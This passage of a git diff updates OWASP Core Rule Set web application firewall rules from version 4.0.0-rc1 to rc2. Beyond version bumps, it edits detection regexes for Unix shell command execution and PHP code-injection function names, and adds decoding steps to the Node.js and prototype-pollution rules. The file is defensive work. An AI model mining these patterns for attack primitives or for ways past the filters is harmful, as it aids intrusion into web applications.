[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))" \
+    "id:932238,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,t:cmdLine,t:normalizePath,\
+    msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-shell',\
+    tag:'platform-unix',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/3',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/248/88',\
+    tag:'PCI/6.5.2',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -617,7 +711,7 @@ SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -635,7 +729,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -653,7 +747,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -671,7 +765,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -690,7 +784,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
index 050051c..741371e 100644
--- a/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
+++ b/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -24,7 +24,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -43,7 +43,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -62,7 +62,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.933120_tx_0=%{tx.0}',\
     chain"
@@ -85,7 +85,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -104,7 +104,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -122,7 +122,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -141,11 +141,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:a(?:rray_(?:(?:diff|intersect)_u(?:assoc|key)|filter|map|reduce|u(?:diff|intersect)(?:_u?assoc)?)|ssert(?:_options)?)|b(?:(?:ase64_en|son_(?:de|en))code|zopen)|c(?:hr|onvert_uuencode|reate_function|url_(?:exec|file_create|init))|(?:debug_backtrac|json_(?:de|en)cod|tmpfil)e|e(?:rror_reporting|scapeshell(?:arg|cmd)|val|x(?:ec|if_(?:imagetype|read_data|t(?:agname|humbnail))))|f(?:i(?:le(?:(?:_exist|perm)s|(?:[acm]tim|inod)e|group)?|nfo_open)|open|(?:pu|unction_exis)ts|tp_(?:connec|ge|nb_(?:ge|pu)|pu)t|write)|g(?:et(?:_(?:c(?:fg_va|urrent_use)r|meta_tags)|(?:cw|lastmo)d|env|imagesize|my(?:[gpu]id|inode))|lob|z(?:compress|(?:(?:defla|wri)t|encod|fil)e|open|read))|h(?:(?:ash_(?:(?:hmac|update)_)?|ighlight_)file|e(?:ader_register_callback|x2bin)|tml(?:_entity_decode|entities|specialchars(?:_decode)?))|i(?:mage(?:2?wbmp|createfrom(?:gif|(?:jpe|pn)g|wbmp|x[bp]m)|g(?:d2?|if)|(?:jpe|pn)g|xbm)|ni_(?:get(?:_all)?|set)|ptcembed|s_(?:dir|(?:(?:execut|read|write?)ab|fi)le)|terator_apply)|m(?:b_(?:ereg(?:_(?:match|replace(?:_callback)?)|i(?:_replace)?)?|parse_str)|(?:d5|ove_uploaded)_file|ethod_exists|kdir|ysql_query)|o(?:b_(?:clean|end_(?:clean|flush)|flush|get_(?:c(?:lean|ontents)|flush)|start)|dbc_(?:connect|exec(?:ute)?|result(?:_all)?)|pendir)|p(?:a(?:rse_(?:ini_file|str)|ssthru)|g_(?:connect|(?:execut|prepar)e|query)|hp(?:_(?:strip_whitespac|unam)e|info|version)|o(?:pen|six_(?:get(?:(?:e[gu]|g)id|login|pwnam)|kill|mk(?:fifo|nod)|ttyname))|r(?:eg_(?:match(?:_all)?|replace(?:_callback(?:_array)?)?|split)|int_r|oc_(?:(?:clos|nic|terminat)e|get_status|open))|utenv)|r(?:awurl(?:de|en)code|e(?:ad(?:_exif_data|dir|(?:gz)?file)|(?:gister_(?:shutdown|tick)|name)_function)|unkit_(?:constant_(?:add|redefine)|(?:function|method)_(?:add|copy|re(?:defin|nam)e)))|s(?:e(?:ssion_s(?:et_save_handler|tart)|t(?:_(?:e(?:rror|xception)_handler|include_path|magic_quotes_runtime)|defaultstub))|h(?:a1_fil|ow_sourc)e|implexml_load_(?:file|string)|ocket_c(?:onnect|reate)|pl_autoload_register|qlite_(?:(?:(?:array|single|unbuffered)_)?query|create_(?:aggregate|function)|exec|p?open)|tr(?:eam_(?:context_create|socket_client)|ipc?slashes|rev)|ystem)|u(?:[ak]?sort|n(?:pack|serialize)|rl(?:de|en)code)|var_dump)(?:/(?:\*.*\*/|/.*)|#.*[\s\v]|\")*[\"']*\)?[\s\v]*\(.*\)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|file(?:group)?|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|md5|o(?:pendir|rd)|p(?:assthru|open|rev)|(?:read|tmp)file|un(?:pac|lin)k|s(?:tat|ubstr|ystem))(?:/(?:\*.*\*/|/.*)|#.*[\s\v]|\")*[\"']*\)?[\s\v]*\(.*\)" \
     "id:933160,\
     phase:2,\
     block,\
@@ -160,7 +160,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -179,7 +179,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -198,7 +198,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -217,7 +217,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -238,7 +238,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.933151_tx_0=%{tx.0}',\
     chain"
@@ -263,11 +263,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:bs|cosh?|r(?:ray|sort)|s(?:inh?|(?:o|se)rt)|tan[2h]?)|b(?:asename|indec)|c(?:eil|h(?:dir|eckdate|mod|o(?:p|wn)|root)|lose(?:dir|log)|o(?:(?:mpac|(?:nsta|u)n)t|py|sh?)|(?:ryp|urren)t)|d(?:ate|e(?:coct|fined?)|i(?:(?:skfreespac)?e|r(?:name)?)|(?:oubleva)?l)|e(?:a(?:ch|ster_da(?:te|ys))|cho|mpty|nd|r(?:egi?|ror_log)|x(?:(?:i|trac)t|p(?:lode)?))|f(?:close|eof|gets|ile(?:owner|pro|(?:siz|typ)e)|l(?:o(?:atval|ck|or)|ush)|(?:mo|rea)d|stat|t(?:ell|ok)|unction)|g(?:et(?:date|t(?:ext|ype))|mdate)|h(?:ash|e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot)|i(?:conv|(?:dat|mplod)e|n(?:(?:clud|vok)e|t(?:div|val))|s(?:_(?:a(?:rray)?|bool|(?:calla|dou)ble|f(?:inite|loat)|in(?:finite|t(?:eger)?)|l(?:ink|ong)|n(?:an|u(?:ll|meric))|object|re(?:al|source)|s(?:calar|tring))|set))|join|k(?:ey|sort)|l(?:(?:cfirs|sta)t|evenshtein|i(?:nk(?:info)?|st)|o(?:caltime|g(?:1[0p])?)|trim)|m(?:a(?:i[ln]|x)|b(?:ereg|split)|etaphone|hash|i(?:crotime|n)|y?sql)|n(?:atsor|ex)t|o(?:ctdec|penlog|rd)|p(?:a(?:ck|thinfo)|close|i|o[sw]|r(?:ev|intf?))|quotemeta|r(?:an(?:d|ge)|e(?:adlin[ek]|(?:cod|nam|quir)e|set|wind)|ound|sort|trim)|s(?:(?:candi|ubst)r|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|nh?|zeof)|leep|o(?:rt|undex)|p(?:liti?|rintf)|qrt|rand|t(?:at|r(?:coll|(?:le|sp)n))|y(?:mlink|slog))|t(?:a(?:int|nh?)|e(?:mpnam|xtdomain)|ime|ouch|rim)|u(?:cfirst|mask|n(?:iqid|link|(?:se|tain)t)|s(?:leep|ort))|virtual|wordwrap)(?:[\s\v]|/(?:\*.*\*/|/.*)|#.*)*\(.*\)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:bs|s(?:in|sert(?:_options)?))|basename|c(?:h(?:eckdate|r(?:oot)?)|o(?:(?:mpac|(?:nsta|u)n)t|py|sh?)|r(?:eate_function|ypt)|urrent)|d(?:ate|e(?:coct|fined?)|ir)|e(?:nd|val|x(?:ec|p(?:lode)?|tract))|f(?:ile(?:(?:[acm]tim|inod|siz|typ)e|group|owner|perms)?|l(?:o(?:ck|or)|ush))|glob|h(?:ash|eader)|i(?:date|m(?:age(?:gif|(?:jpe|pn)g|wbmp|xbm)|plode)|s_a)|key|l(?:ink|og)|m(?:a(?:il|x)|d5|in)|n(?:ame|ext)|o(?:pendir|rd)|p(?:a(?:ck|ss(?:thru)?)|i|o(?:pen|w)|rev)|r(?:an(?:d|ge)|e(?:(?:adfil|nam)e|set)|ound)|s(?:(?:erializ|huffl)e|in|leep|(?:or|ta)t|ubstr|y(?:mlink|s(?:log|tem)))|t(?:an|(?:im|mpfil)e|ouch|rim)|u(?:cfirst|n(?:lin|pac)k)|virtual)(?:[\s\v]|/\*.*\*/|(?:#|//).*)*\(.*\)" \
     "id:933161,\
     phase:2,\
     block,\
@@ -282,7 +282,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -301,7 +301,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -320,7 +320,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -339,7 +339,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
index b83f624..072033e 100644
--- a/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+++ b/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -35,7 +35,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     phase:2,\
     block,\
     capture,\
-    t:none,t:urlDecodeUni,t:base64Decode,\
+    t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,\
     msg:'Node.js Injection Attack 2/2',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -46,7 +46,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -66,7 +66,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/664',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -75,7 +75,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     phase:2,\
     block,\
     capture,\
-    t:none,t:urlDecodeUni,t:base64Decode,\
+    t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,\
     msg:'JavaScript Prototype Pollution',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -86,7 +86,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1/180/77',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -107,7 +107,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -116,7 +116,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     phase:2,\
     block,\
     capture,\
-    t:none,t:urlDecodeUni,t:base64Decode,t:replaceComments,\
+    t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:replaceComments,\
     msg:'Node.js DoS attack',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -127,7 +127,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -147,7 +147,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -168,7 +168,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/664',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -177,7 +177,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     phase:2,\
     block,\
     capture,\
-    t:none,t:urlDecodeUni,t:base64Decode,\
+    t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,\
     msg:'JavaScript Prototype Pollution',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
